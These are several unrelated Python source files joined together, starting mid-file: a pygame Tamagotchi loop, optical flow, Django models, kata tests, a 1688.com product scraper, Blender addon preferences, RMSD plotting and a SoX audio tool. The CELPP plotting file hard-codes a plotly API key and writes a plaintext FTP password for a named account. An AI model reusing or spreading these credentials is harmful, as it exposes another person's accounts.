            if(tamagotchi.food > 0):
                tamagotchi.food -= 1
            else:
                tamagotchi.food = 0
            if(tamagotchi.food < 20):
                tamagotchi.health -= 1
        # BOREDOM (LOWERING HAPPINESS)
        if frameCount % 80 == 0:
            if tamagotchi.happiness > 0:
                tamagotchi.happiness -= 1
            else:
                tamagotchi.happiness = 0
        # ILLNESS: draw the illness sprite and drain health every 100 frames
        if tamagotchi.ill == 1:
            screen.blit(tamagotchi.illness, (80, 200))
            pygame.display.update((80, 200), (120, 120))
            if frameCount % 100 == 0:
                tamagotchi.health -= 1
        # HEALTH: clamp at zero
        if tamagotchi.health < 0:
            tamagotchi.health = 0
        # DEATH: trigger the death animation exactly once
        if tamagotchi.health <= 0:
            if tamagotchi.death == 0:
                tamagotchi.animationFrame = 0
                tamagotchi.currentAnimation = "death"
                tamagotchi.death = 1
        # PRINT TAMAGOTCHI VARIABLES (debug output every 20 frames)
        if frameCount % 20 == 0:
            print("energy:"+str(tamagotchi.energy))
            print("food:"+str(tamagotchi.food))
            print("happiness:"+str(tamagotchi.happiness))
            print("hygiene:"+str(tamagotchi.hygiene))
            print("health:"+str(tamagotchi.health))
            print("sad:"+str(tamagotchi.sad))
            print("ill:"+str(tamagotchi.ill))
            print("death:"+str(tamagotchi.death))
        # DISPLAYING TAMAGOTCHI ANIMATIONS
        tamagotchi.animate()
        frameCount += 1
        screen.fpsClock.tick(screen.FPS)

main()
pygame.quit()
import cv2
import numpy as np
from src.image.utils import derivative_hs
# TODO add clipping
class HornSchunkFrame():
    """Horn-Schunck optical flow between two single-channel frames.

    ``alpha`` is the smoothness regularization weight; ``num_iter`` the
    number of iterative flow updates.
    """
    def __init__(self, alpha, num_iter):
        self.alpha = alpha
        self.num_iter = num_iter

    def compute_derivatives(self, anchor, target):
        """Return the spatial (x, y) and temporal (t) derivatives between the frames."""
        i_x = derivative_hs(img1=anchor, img2=target, direction='x')
        i_y = derivative_hs(img1=anchor, img2=target, direction='y')
        i_t = derivative_hs(img1=anchor, img2=target, direction='t')
        return i_x, i_y, i_t

    def weighted_average(self, frame):
        """Smooth ``frame`` with a normalized 3x3 weighted-average kernel."""
        # NOTE(review): ``filter`` shadows the builtin of the same name.
        filter = np.array([[1, 2, 1],
                           [2, 4, 2],
                           [1, 2, 1]]) / 16
        return cv2.filter2D(src=frame, kernel=filter, ddepth=-1)

    def __call__(self, anchor, target):
        """Iteratively estimate the flow field (u, v) from anchor to target.

        Raises on non-ndarray input; asserts matching 2-D (grayscale) shapes.
        """
        if type(anchor) is not np.ndarray:
            raise Exception("Please input a numpy nd array")
        if type(target) is not np.ndarray:
            raise Exception("Please input a numpy nd array")
        assert anchor.shape == target.shape, "Frame shapes do not match"
        assert len(anchor.shape) == 2, "Frames should be gray"
        u_k = np.zeros_like(anchor)
        v_k = np.zeros_like(anchor)
        i_x, i_y, i_t = self.compute_derivatives(anchor, target)
        for iteration in range(self.num_iter):
            u_avg = self.weighted_average(u_k)
            v_avg = self.weighted_average(v_k)
            # Horn-Schunck update step.
            numerator = i_x * u_avg + i_y * v_avg + i_t
            denominator = self.alpha ** 2 + i_x ** 2 + i_y ** 2
            u_k = u_avg - i_x * (numerator / denominator)
            v_k = v_avg - i_y * (numerator / denominator)
            # Zero out NaNs (e.g. from 0/0 divisions) each iteration.
            u_k[np.isnan(u_k)] = 0
            v_k[np.isnan(v_k)] = 0
        return u_k, v_k
def reconstruct(anchor, u, v):
    """Warp ``anchor`` forward along the flow field (u, v).

    Each source pixel (h, w) moves to (h + u[h, w], w + v[h, w]), truncated
    to int and clamped to the image bounds; later writes overwrite earlier
    ones. Unmapped destination pixels stay zero.
    """
    assert u.shape == v.shape
    height, width = u.shape
    warped = np.zeros_like(u)
    for row in range(height):
        for col in range(width):
            dst_row = min(max(int(row + u[row, col]), 0), height - 1)
            dst_col = min(max(int(col + v[row, col]), 0), width - 1)
            warped[dst_row, dst_col] = anchor[row, col]
    return warped
|
from django.db.models import Model, IntegerChoices, CASCADE, ForeignKey, IntegerField, BinaryField, TextField, \
FileField, URLField
from .core import RecordedUser
from django.utils.translation import gettext_lazy as _
# Create your models here.
class InstantContent(Model):
    """
    The content that can be easily previewed and transmitted:
    contentType: IntegerField
        1: 'text & image'([pure text] OR [pure image] OR [text + image])
        2: 'location'
        3: 'voice'
    content: BinaryField
        binary version of the content, it should contain all the information of the InstantContent
    compressionMethod: IntegerField
        1: 'gzip'
    textVersionContent: TextField
        text version of the content, the value should be:
            if the type is pure text:
                the original pure text
            if the type is pure image:
                blank
            if the type is text + image:
                only the text content
            if the type is location:
                GPS: (xxx.xxx,yyy.yyy,zzz.zzz)
                Location: provided by the user or Google API
            if the type is voice:
                the converted text content
    """
    class ContentType(IntegerChoices):
        TYPE_TEXT_IMAGE = 1, _("Text & Image")
        TYPE_LOCATION = 2, _("Location")
        TYPE_VOICE = 3, _("Voice")

    class CompressionMethod(IntegerChoices):
        TYPE_GZIP = 1, _("gzip")

    user = ForeignKey(to=RecordedUser, on_delete=CASCADE, null=True)
    contentType = IntegerField(choices=ContentType.choices, null=True)
    content = BinaryField(null=True)
    compressionMethod = IntegerField(choices=CompressionMethod.choices, null=True)
    textVersionContent = TextField(null=True)

    def __str__(self):
        # Bug fix: the method was named ``_str_`` (a plain method Python never
        # calls for str()) and returned ``self.title``, an attribute this
        # model does not define (AttributeError when invoked).
        return self.textVersionContent or ""
class InstantContentDraft(InstantContent):
    """
    Same as InstantContent, but not finished yet; no textVersionContent needed.
    """
    # NOTE(review): a concrete subclass means Django multi-table inheritance
    # (own table + implicit one-to-one link) -- confirm that is intended.
    pass
class File(Model):
    """A finished, downloadable upload.

    uploadAs: FileField
        the file should be uploaded to "files/$uid/finished/$fileName"
    downloadUrl: URLField
        the url to directly download the file
    """
    uploadAs = FileField(null=True)
    downloadUrl = URLField(null=True)
class UploadingFile(Model):
    """An in-progress (chunked) upload.

    uploadingDir: FileField
        the file should be uploaded as "files/$uid/$filePathAbove/$count"
    """
    uploadingDir = FileField(null=True)
|
def drawTriangle(t, p1, p2, p3):
    """Draw the closed triangle p1-p2-p3 with turtle ``t`` (pen up while moving to p1)."""
    t.up()
    t.goto(p1)
    t.down()
    for corner in (p2, p3, p1):
        t.goto(corner)
def midPoint(p1, p2):
    """Return the midpoint of the segment p1-p2 as a tuple of floats."""
    mid_x = (p1[0] + p2[0]) / 2.0
    mid_y = (p1[1] + p2[1]) / 2.0
    return (mid_x, mid_y)
def sierpinski(myturtle, p1, p2, p3, depth):
    """Recursively draw a Sierpinski gasket of the given depth.

    At depth 0 the triangle itself is drawn; otherwise recurse into the three
    corner sub-triangles formed by the edge midpoints.
    """
    if depth <= 0:
        drawTriangle(myturtle, p1, p2, p3)
        return
    for a, b, c in ((p1, p2, p3), (p2, p3, p1), (p3, p1, p2)):
        sierpinski(myturtle, a, midPoint(a, b), midPoint(a, c), depth - 1)
# NOTE(review): import at the bottom of the file is unconventional -- it works
# here because nothing above executes turtle code at import time.
from cTurtle import *
t=Turtle()
# Depth-4 Sierpinski gasket on a right triangle with legs of length 100.
sierpinski(t,(0,0),(100,0),(100,100),4)
|
import unittest
from katas.kyu_6.english_to_enigeliisohe import toexuto
class ToexutoTestCase(unittest.TestCase):
    """Tests for the kyu-6 'english to enigeliisohe' kata's ``toexuto``."""

    def test_equals(self):
        self.assertEqual(toexuto('little'), 'liitotolie')

    def test_equals_2(self):
        # Case is preserved by the transformation.
        self.assertEqual(toexuto('BIG'), 'BaIGe')

    def test_equals_3(self):
        self.assertEqual(toexuto(
            'This is a test. This is only a test.'),
            'Toheiso iso a toesoto. Toheiso iso oniliyu a toesoto.')
|
import unittest
from katas.kyu_7.credit_card_mask import maskify
class MaskifyTestCase(unittest.TestCase):
    """Tests for ``maskify``: mask all but the last four characters with '#'."""

    def test_equals(self):
        self.assertEqual(maskify('4556364607935616'), '############5616')

    def test_equals_2(self):
        self.assertEqual(maskify('64607935616'), '#######5616')

    def test_equals_3(self):
        # Strings of length <= 4 are returned unchanged.
        self.assertEqual(maskify('1'), '1')

    def test_equals_4(self):
        self.assertEqual(maskify(''), '')
|
# coding=utf8
import model
from sqlalchemy import or_
import tornado.web
import requests
import re, json, os, traceback
class BaseHelper(tornado.web.RequestHandler):
    """Base request handler: wires up the SQLAlchemy session and common CRUD helpers."""
    #_cache_query_all = {}

    def initialize(self):
        self.model = self.application.model
        self.db = self.application.model.session

    def on_finish(self):
        # Return the session to the pool once the request completes.
        self.db.close()

    def update_obj(self, obj, data, commit=False):
        """Copy keys from ``data`` onto matching attributes of ``obj``; optionally commit."""
        for key in data:
            hasattr(obj, key) and setattr(obj, key, data.get(key))
        commit and self.db.commit()

    def delete_objs(self, objs, commit=False):
        """Delete every object in ``objs``; optionally commit."""
        for obj in objs:
            self.db.delete(obj)
        commit and self.db.commit()

    def model2dict(self, model_obj, columns=None, ignore=[]):
        """Serialize ``model_obj`` to a dict of its columns (or the given subset)."""
        # NOTE(review): mutable default ``ignore=[]`` is a known Python pitfall,
        # though harmless here since it is only read.
        columns = columns is None and (column.name for column in model_obj.__table__.columns if column not in ignore) or columns
        return dict(((column, getattr(model_obj, column)) for column in columns))

    #def cache_query_all(self, model, certain={}):
        #if model in self._cache_query_all:
            #cache_certain = self._cache_query_all[model]['certain']
            #if len(certain)==len(cache_certain):
                #dissimilar = 0
                #for key in certain:
                    #if key not in cache_certain or certain[key]!=cache_certain[key]: dissimilar+=1
                #if not dissimilar: return self._cache_query_all[model]['data']
        #data = self.db.query(model).filter_by(**certain).all()
        #self._cache_query_all[model] = {'certain': certain, 'data': data}
        #print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>create')
        #return data
    #def clear_cache_query(self, models=[]):
        #if models:
            #for model in models:
                #if model in self._cache_query: del self._cache_query[model]
        #else:
            #self._cache_query.clear()

    def multi_columns_query(self, query, model, columns, keywords):
        """AND together per-keyword filters; each keyword must LIKE-match at least one column."""
        if columns and keywords:
            keywords = ['%'+keyword+'%' for keyword in keywords]
            keyword_certains = []
            for keyword in keywords:
                keyword_certains.append(or_(*[getattr(model, column).like(keyword) for column in columns]))
            return query.filter(*keyword_certains)
        return query

    def show_page(self, template, query, per_page, *args, **kwargs):
        """Render one page of ``query`` results; out-of-range pages render nothing."""
        page = int(self.get_argument('page', 1))
        if page<1:
            return
        start_index = (page-1)*per_page
        count = query.count()
        if count and page>count:
            return
        self.render(template, *args, data=query.offset(start_index).limit(per_page), page=page, max_page=count//per_page+1, start_index=start_index+1, count=count, per_page=per_page, **kwargs)
class FetchHelper(BaseHelper):
    """Scrapes product listings and detail data from a 1688.com shop."""
    LIST_INDEX_URL = 'http://{shop_name}.1688.com/page/offerlist.htm'
    LIST_URL = 'http://{shop_name}.1688.com/page/offerlist.htm?showType=catalog&tradenumFilter=false&sampleFilter=false&mixFilter=false&privateFilter=false&mobileOfferFilter=%24mobileOfferFilter&groupFilter=false&sortType=timedown&pageNum={page}'
    PRODUCT_URL = 'http://m.1688.com/offer/{offer_id}.html'
    # Total page count scraped from the list page footer.
    MAX_PAGE_RE = re.compile(r'<li>共<em class="page-count">(\d+)', re.S)
    PRODUCT_RE = re.compile(r'<a href="http://detail.1688.com/offer/([^\.]+)[^>]+>\s+<img src="[^"]+" alt="[^"]+"\s+/>', re.S)
    DETAIL_RE = re.compile(r'<script>window\.wingxViewData=window\.wingxViewData\|\|\{\};window\.wingxViewData\[0\]=(.+?)(?=</script></div></div>)', re.S)

    def fetch_offer_list(self):
        """Yield every offer id from the shop's paginated offer list."""
        config = self.db.query(model.ConfigModel).first()
        list_index_url = self.LIST_INDEX_URL.format(shop_name=config.shop_name)
        # Retry until the index page downloads successfully.
        # NOTE(review): bare except + infinite retry can hang forever on a
        # persistent failure.
        while 1:
            try:
                list_page = requests.get(list_index_url).text
                if list_page: break
            except:
                print('Fetch offer list error!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
                traceback.print_exc()
        pages = int(self.MAX_PAGE_RE.search(list_page).group(1))
        for page in range(1, pages+1):
            print('第%d页' % page)
            list_page = requests.get(self.LIST_URL.format(shop_name=config.shop_name, page=page)).text
            for product_search in self.PRODUCT_RE.finditer(list_page):
                yield product_search.group(1)

    def fetch_offer_dict(self, offer_id):
        """Download and normalize the detail JSON for one offer (retries forever on error)."""
        while 1:
            try:
                product_page = requests.get(self.PRODUCT_URL.format(offer_id=offer_id)).text
                detail_search = self.DETAIL_RE.search(product_page)
                data = json.loads(detail_search.group(1))
                # Highest quantity tier of the price ranges, if present.
                data['begin']=max([int(item[0]) for item in data['skuPriceRanges']]) if data['skuPriceRanges'] else None
                # 'priceDisplay' may be a range like "1.0-2.0": keep the lower bound.
                if data.get('priceDisplay') != None:
                    data['priceDisplay'] = float(data.get('priceDisplay').split('-')[0])
                data['productFeatureList'] = dict(((i['name'], i['value']) for i in data['productFeatureList']))
                if data['productFeatureList'].get('主面料成分的含量') != None:
                    data['productFeatureList']['主面料成分的含量'] = float(data['productFeatureList']['主面料成分的含量'])
                # Flatten skuMap ("color>size"-keyed dict) into a list of dicts
                # with typed numeric fields.
                temp = []
                for name in data['skuMap'] or []:
                    item = data['skuMap'][name]
                    item.update(zip(['color', 'size'], name.split('>')))
                    for key, data_type in (('canBookCount', int), ('discountPrice', float), ('saleCount', int)):
                        if key in item and item[key] != None:
                            item[key] = data_type(item[key])
                    temp.append(item)
                data['skuMap'] = temp
                if data: break
            except:
                print('Fetch offer dict error!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
                traceback.print_exc()
        return data

    def thumb(self, url, size=100):
        """Return the thumbnail URL: insert '<size>x<size>' before the file extension."""
        url_split = url.rsplit('.', 1)
        url_split.insert(1, '%dx%d' % (size, size))
        return '.'.join(url_split)

    def save_img(self, url, filename):
        """Download ``url`` to media/img/product/<filename>.jpg and return its web path."""
        target = os.path.join(os.getcwd(), 'media/img/product', filename+'.jpg')
        content = requests.get(url).content
        with open(target, 'wb') as f:
            f.write(content)
        return '/media/img/product/' + filename + '.jpg'
|
import math
def tree_height(degrees, distance):
    """Return the height of a tree given the distance from its base and
    the measured elevation angle (in degrees) to its top."""
    angle_rad = degrees * math.pi / 180
    return distance * math.tan(angle_rad)
# Data are in the form: ID of individual, distance (m) and angle (degrees)
trees = [ ('A', 31.66, 41.28),
          ('B', 45.98, 44.53),
          ('C', 31.24, 25.14),
          ('D', 34.61, 23.33),
          ('E', 45.46, 38.34),
          ('F', 48.79, 33.59),
          ('H', 30.64, 29.66),
        ]
# For each individual, print its ID and height.
# Defect fixed: the original called tree_height(trees) with the whole list
# (a TypeError) instead of one (angle, distance) pair per tree.
for tree_id, distance, angle in trees:
    print(tree_id, tree_height(angle, distance))
|
from FileTransfer import FtpFileTransfer
import os
import shutil
import prody
import plotly as py
import pandas as pd
import numpy as np
import seaborn as sns
import plotly.plotly as py
import plotly.tools as plotly_tools
import plotly.graph_objs as go
import plotly.offline as offline
import os
import matplotlib.pyplot as plt
import matplotlib as mpl
%matplotlib inline
from scipy.stats import gaussian_kde
from IPython.display import HTML
# SECURITY NOTE(review): plotly credentials are hard-coded in source;
# move the API key into a config file or environment variable.
py.sign_in("juz19", "gns0PM7FQ368i6A8tNOZ")
def fetch_visual_file():
    """Fetch 'visual.txt' from the CELPP challenge data on ftp.box.com.

    Side effects: sets the module-global `wd`, may write credentials.txt,
    creates/enters the challengedata_Visualizaiton directory, and changes
    the process working directory.
    """
    global wd
    wd = str(os.getcwd())
    print('All Files will go into the celpp folder')
    cred = (wd + '/credentials.txt')
    try:  # attempts to connect to file required to connect to ftp
        print('Trying to open credentials.txt')
        fo = open(cred, 'r')
        fo.close()
    except:  # writes file required to connect to ftp if not already made
        # SECURITY NOTE(review): a plaintext password is embedded here and
        # written to disk; move it out of source control.
        print('Writing credentials.txt file')
        fo = open(cred, 'w')
        fo.write('host ftp.box.com\nuser nlr23@pitt.edu\npass #hail2pitt1\npath\ncontestantid 33824\nchallengepath /challengedata\nsubmissionpath /33824')
        fo.close()
    # ("Visualizaiton" spelling is kept as-is: the directory name is runtime
    # behavior other runs may depend on.)
    if(os.path.isdir(wd + '/challengedata_Visualizaiton')==False):  # creates challengedata folder if it doesn't exist
        print('challengedata_Visualizaiton directory does not exists. ')
        os.mkdir(wd + '/challengedata_Visualizaiton')
        os.chdir(wd + '/challengedata_Visualizaiton')
    else:  # changes to challengedata folder if it exists
        os.chdir(wd + '/challengedata_Visualizaiton')
    ftp = FtpFileTransfer(cred)
    print('Connecting to ftp.box.com')
    ftp.connect()
    print('Connected to ftp')
    ftp_files = ftp.list_files('challengedata')  # creates list of files from box
    for x in (ftp_files):
        if (x == 'visual.txt'):
            # NOTE(review): downloads into wd + '/challengedata/', not the
            # '_Visualizaiton' directory created above — confirm intended.
            ftp.download_file('challengedata/' + x, wd + '/challengedata/' + x)
    ftp.disconnect()
    print('Disconnected from ftp')
def box_plot(rmsd, week_num):
    """Build a plotly figure with one box of all pose RMSDs per target,
    plus markers for the best and first-pose RMSD.

    rmsd -- mapping of target name -> list of RMSD values (first entry is
            the first pose)
    week_num -- week number, used only in the title
    """
    x_data = list(rmsd.keys())
    y_data = []
    for x in x_data:
        data = rmsd.get(x)
        y_data.append(data)
    # Best (minimum) and first-pose RMSD per target.
    y_best_rmsd = []
    y_first_rmsd = []
    for y in y_data:
        min_rmsd = min(y)
        first_rmsd = y[0]
        y_best_rmsd.append(min_rmsd)
        y_first_rmsd.append(first_rmsd)
    # One distinct hue per target, evenly spaced around the color wheel.
    N = len(x_data)
    colors = ['hsl('+str(h)+',50%'+',50%)' for h in np.linspace(0, 360, N)]
    traces = []
    for xd, yd, ybest, yfirst, cls in zip(x_data, y_data, y_best_rmsd, y_first_rmsd, colors):
        # Box of every pose RMSD for this target.
        traces.append(go.Box(
            y=yd,
            name=xd,
            boxpoints='all',
            jitter=1,
            whiskerwidth=1,
            pointpos = -2,
            fillcolor=cls,
            marker=dict(size=3,),
            line=dict(width=1.5),))
        # Best-RMSD marker (open square).
        traces.append(go.Scatter(
            showlegend = True,
            legendgroup = 'Best RMSD',
            y = ybest,
            x = xd,
            name = xd + ' Best RMSD',
            fillcolor=cls,
            marker = dict(size = 15, symbol = 'square-open', ), ))
        # First-pose marker (star).
        traces.append(go.Scatter(
            showlegend = True,
            legendgroup = 'First Pose RMSD',
            y = yfirst,
            x = xd,
            name = xd + ' First Pose RMSD',
            fillcolor = cls,
            marker = dict(size = 15, symbol = 'star', ),))
    # NOTE(review): layout showlegend=False overrides the per-trace
    # showlegend=True above — confirm which behavior is intended.
    layout = go.Layout(title='RMSD for all Targets in Week' + str(week_num),
        yaxis=dict(autorange=True,showgrid=True,zeroline=True,dtick=5,
            gridcolor='rgb(255, 255, 255)', gridwidth=1,
            zerolinecolor='rgb(255, 255, 255)',zerolinewidth=2,),
        margin=dict(l=40,r=30,b=80,t=100,),
        paper_bgcolor='rgb(243, 243, 243)',
        plot_bgcolor='rgb(243, 243, 243)',
        showlegend=False)
    fig = go.Figure(data=traces, layout=layout)
    return fig
def bar_plot(rmsd, week_num):
    """Build a grouped plotly bar chart of best vs. first-pose RMSD per
    target for one week.

    rmsd -- mapping of target name -> list of RMSD values (first entry is
            the first pose)
    week_num -- week number, used only in the title
    """
    targets = list(rmsd.keys())
    per_target = [rmsd.get(t) for t in targets]
    best = [min(values) for values in per_target]
    first = [values[0] for values in per_target]
    best_trace = go.Bar(
        x = targets,
        y = best,
        name='Best RMSD'
    )
    first_trace = go.Bar(
        x = targets,
        y = first,
        name='First Pose RMSD'
    )
    layout = go.Layout(title='Best and First Pose RMSD for all Targets in Week' + str(week_num),
        barmode='group'
    )
    return go.Figure(data=[best_trace, first_trace], layout=layout)
|
import os
import bpy
from bpy.props import BoolProperty
from photogrammetry_importer.blender_logging import log_report
from photogrammetry_importer.camera_import_properties import CameraImportProperties
from photogrammetry_importer.point_import_properties import PointImportProperties
from photogrammetry_importer.mesh_import_properties import MeshImportProperties
from photogrammetry_importer.registration import register_importers
from photogrammetry_importer.registration import unregister_importers
from photogrammetry_importer.registration import register_exporters
from photogrammetry_importer.registration import unregister_exporters
def get_addon_name():
    """Return the top-level addon package name (first dotted component of __name__)."""
    return __name__.partition('.')[0]
class PhotogrammetryImporterPreferences(bpy.types.AddonPreferences,
                                        CameraImportProperties,
                                        PointImportProperties,
                                        MeshImportProperties):
    """Addon preferences: importer/exporter toggles plus default import options."""

    # __name__ == photogrammetry_importer.preferences.addon_preferences
    bl_idname = get_addon_name()

    # Importer toggles
    colmap_importer_bool: BoolProperty(
        name="Colmap Importer",
        default=True)
    meshroom_importer_bool: BoolProperty(
        name="Meshroom Importer",
        default=True)
    open3d_importer_bool: BoolProperty(
        name="Open3D Importer",
        default=True)
    opensfm_importer_bool: BoolProperty(
        name="OpenSfM Importer",
        default=True)
    openmvg_importer_bool: BoolProperty(
        name="OpenMVG Importer",
        default=True)
    ply_importer_bool: BoolProperty(
        name="PLY Importer",
        default=True)
    visualsfm_importer_bool: BoolProperty(
        name="VisualSfM Importer",
        default=True)

    # Exporter toggles
    colmap_exporter_bool: BoolProperty(
        name="Colmap Exporter",
        default=True)
    visualsfm_exporter_bool: BoolProperty(
        name="VisualSfM Exporter",
        default=True)

    def draw(self, context):
        """Draw the preferences panel."""
        layout = self.layout
        toggles_box = layout.box()
        toggles_box.label(
            text='Active Importers / Exporters:')
        split = toggles_box.split()

        importer_box = split.column().box()
        for prop_name in ("colmap_importer_bool", "meshroom_importer_bool",
                          "open3d_importer_bool", "opensfm_importer_bool",
                          "openmvg_importer_bool", "ply_importer_bool",
                          "visualsfm_importer_bool"):
            importer_box.prop(self, prop_name)

        exporter_box = split.column().box()
        for prop_name in ("colmap_exporter_bool", "visualsfm_exporter_bool"):
            exporter_box.prop(self, prop_name)

        toggles_box.operator("photogrammetry_importer.update_importers_and_exporters")

        options_box = layout.box()
        options_box.label(text='Default Import Options:')
        self.draw_camera_options(options_box, draw_everything=True)
        self.draw_point_options(options_box, draw_everything=True)
        self.draw_mesh_options(options_box)
class UpdateImportersAndExporters(bpy.types.Operator):
    """Operator that re-registers importers/exporters so toggle changes
    in the addon preferences take effect immediately."""
    bl_idname = "photogrammetry_importer.update_importers_and_exporters"
    bl_label = "Update (Enable / Disable) Importers and Exporters"

    @classmethod
    def poll(cls, context):
        # Always available.
        return True

    def execute(self, context):
        """Unregister then re-register all importers and exporters using the
        current preference toggles."""
        log_report('INFO', 'Update importers and exporters: ...', self)
        addon_name = get_addon_name()
        import_export_prefs = bpy.context.preferences.addons[addon_name].preferences
        # Unregister first so re-registration reflects the new toggle state.
        unregister_importers()
        register_importers(import_export_prefs)
        unregister_exporters()
        register_exporters(import_export_prefs)
        log_report('INFO', 'Update importers and exporters: Done', self)
        return {'FINISHED'}
|
def sum_of_n(n):
    """Return the triangular-number series with abs(n) + 1 terms.

    The k-th term is the sum 0+1+...+k (= k*(k+1)//2); for negative n the
    terms are negated, e.g. sum_of_n(-5) -> [0, -1, -3, -6, -10, -15].

    Defect fixed: true division (`/`) produced floats ([0.0, 1.0, ...])
    where the specification's examples show integers; since k*(k+1) is
    always even, floor division is exact.
    """
    sign = 1 if n >= 0 else -1
    return [sign * x * (x + 1) // 2 for x in range(abs(n) + 1)]
'''
Sum of 'n' Numbers
A sequence or a series, in mathematics, is a string of objects, like numbers, that follow a particular pattern. The individual elements in a sequence are called terms.
For example, some simple patterns include: 3, 6, 9, 12, 15, 18, 21, ...
Pattern: "add 3 to the previous number to get the next number"
0, 12, 24, 36, 48, 60, 72, ...
Pattern: "add 12 to the previous number to get the next number"
How about generating a more complicated pattern?
0, 1, 3, 6, 10, 15, 21, 28, ...
0 (0), 1 (0+1), 3 (0+1+2), 6 (0+1+2+3), ...
Pattern: "the nth term is the sum of the numbers from 0 to n, inclusive"
sum_of_n (or SequenceSum.sumOfN in Java, SequenceSum.SumOfN in C#) takes an integer n and returns a List (an Array in Java/C#) of length abs(n) + 1. The List/Array contains the numbers in the arithmetic series produced by taking the sum of the consecutive integer numbers from 0 to n inclusive.
n can also be 0 or a negative value.
Wikipedia reference for abs value is available here.
Example:
5 -> [0, 1, 3, 6, 10, 15]
-5 -> [0, -1, -3, -6, -10, -15]
7 -> [0, 1, 3, 6, 10, 15, 21, 28]
'''
|
#!/bin/env python
import parmed as pmd
import sys
# Rename a residue template inside a library file and save it out as
# "<new name>.lib".  Usage: script <lib file> <old name> <new name>
source_lib, old_name, new_name = sys.argv[1:]
residue = pmd.load_file(source_lib)[old_name]
residue.name = new_name
residue.save(new_name + '.lib')
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 2 17:56:23 2020
@author: ali
"""
import sys
import argparse
import platform
import numpy as np
import os
OSplatform= platform.system()
def singlefrequencygenerator():
    '''
    Gets Frequency and duration from user and plays the frequency for the duration.

    Defects fixed: winsound.Beep requires integer arguments (floats raise
    TypeError), and the bare `except:` clauses (which also swallowed
    KeyboardInterrupt) now catch Exception only.

    Returns
    -------
    None.
    '''
    frequency = float(input('Please enter the frequency:\n>>> '))
    duration = float(input('Please enter the duration of the played frequency (in seconds):\n>>> '))
    duration *= 1000  # milliseconds, the unit winsound.Beep expects
    if OSplatform == 'Darwin':
        # First install Homebrew (https://brew.sh/)
        # and then SoX using 'brew install sox' in the terminal
        try:
            os.system('play -n synth %s sin %s' % (duration/1000, frequency))
        except Exception:
            print("This feature uses the SoX software package. \nPlease install Homebrew (https://brew.sh/),\n then install SoX using 'brew install sox' in the terminal")
            exit()
    elif OSplatform == 'Windows':
        import winsound
        # Beep takes int frequency (Hz) and int duration (ms).
        winsound.Beep(int(frequency), int(duration))
    elif OSplatform == 'Linux':
        try:
            os.system('play -n synth %s sin %s' % (duration/1000, frequency))
        except Exception:
            print("This feature uses the SoX software package. \nSoX can be installed using 'sudo apt-get install sox' in the terminal")
            exit()
def multifrequencygenerator():
    '''
    Gets Frequency range and duration from user and plays the frequencies for the duration.

    Defects fixed: winsound.Beep requires integer arguments (floats raise
    TypeError), and the bare `except:` clauses now catch Exception only.

    Returns
    -------
    None.
    '''
    frequency = input('Please enter the frequency range. example: 2 400 \n>>> ').split()
    duration = float(input('Please enter the duration of the played frequency (in seconds):\n>>> '))
    duration *= 1000  # milliseconds
    freqbegin = float(frequency[0])
    freqend = float(frequency[1])
    if OSplatform == 'Darwin':
        try:
            os.system('play -n synth %s sin %s+%s' % (duration/(1000), freqbegin, freqend))
        except Exception:
            print("This feature uses the SoX software package. \nPlease install Homebrew (https://brew.sh/),\n then install SoX using 'brew install sox' in the terminal")
            exit()
    elif OSplatform == 'Windows':
        import winsound
        # NOTE(review): only the start frequency is played on Windows — the
        # sweep to freqend is not implemented here.
        winsound.Beep(int(freqbegin), int(duration))
    elif OSplatform == 'Linux':
        try:
            os.system('play -n synth %s sin %s+%s' % (duration/1000, freqbegin, freqend))
        except Exception:
            print("This feature uses the SoX software package. \nSoX can be installed using 'sudo apt-get install sox' in the terminal")
            exit()
def recordmic():
    """Record 5 seconds from the default microphone via SoX.

    Defect fixed: bare `except:` replaced with `except Exception:`.
    (No Windows branch exists; the function is a no-op there.)
    """
    if OSplatform == 'Darwin':
        try:
            os.system('rec -c 2 testsox.wav trim 0 5')
        except Exception:
            # NOTE(review): os.system does not raise when the command is
            # missing, so this handler is unlikely to fire; consider
            # checking the return code instead.
            print("This feature uses the SoX software package. \nPlease install Homebrew (https://brew.sh/),\n then install SoX using 'brew install sox' in the terminal")
            exit()
    elif OSplatform == 'Linux':
        try:
            os.system('timeout 5 sox -b 32 -e unsigned-integer -r 96k -c 2 -d --clobber --buffer $((96000*2*10)) /tmp/soxrecording.wav')
        except Exception:
            print("This feature uses the SoX software package. \nSoX can be installed using 'sudo apt-get install sox' in the terminal")
            exit()
def record(time):
    """Record `time` seconds of audio to testsox.wav via SoX.

    Defect fixed: bare `except:` replaced with `except Exception:`.
    (No Windows branch exists; the function is a no-op there.)
    """
    if OSplatform == 'Darwin':
        try:
            os.system('rec -c 2 testsox.wav trim 0 {}'.format(time))
        except Exception:
            print("This feature uses the SoX software package. \nPlease install Homebrew (https://brew.sh/),\n then install SoX using 'brew install sox' in the terminal")
            exit()
    elif OSplatform == 'Linux':
        try:
            os.system('rec -c 2 testsox.wav trim 0 {}'.format(time))
        except Exception:
            print("This feature uses the SoX software package. \nSoX can be installed using 'sudo apt-get install sox' in the terminal")
            exit()
def playback():
    """Play back testsox.wav via SoX.

    Defect fixed: bare `except:` replaced with `except Exception:`.
    (No Windows branch exists; the function is a no-op there.)
    """
    if OSplatform == 'Darwin':
        try:
            os.system('play testsox.wav')
        except Exception:
            print("This feature uses the SoX software package. \nPlease install Homebrew (https://brew.sh/),\n then install SoX using 'brew install sox' in the terminal")
            exit()
    elif OSplatform == 'Linux':
        try:
            os.system('play testsox.wav')
        except Exception:
            print("This feature uses the SoX software package. \nSoX can be installed using 'sudo apt-get install sox' in the terminal")
            exit()
def echomode():
    """Repeatedly record t seconds of audio and play it back until the
    user quits, then delete the temporary recording."""
    print('\nRecord for t seconds. Then hear the playback')
    time = input('\nPlease set t. \nIf this is your first time, try 5 seconds >>> ')
    input('Press enter to start.')
    while True:
        record(time)
        playback()
        keyin = input('Press enter to start again or q to exit >>> ')
        if keyin == 'q':
            break
    os.system('rm testsox.wav')
def argparser():
    """Parse command-line options for the frequency generator.

    Defect fixed: a second bare ArgumentParser() was created immediately
    after the first, discarding the 'Frequency generator' description.
    """
    parser = argparse.ArgumentParser(description='Frequency generator')
    parser.add_argument('--mode', type=str, required=True,
                        help="Set frequency generator mode: 'S' single, 'R' Ranged frequency mode.")
    return parser.parse_args()
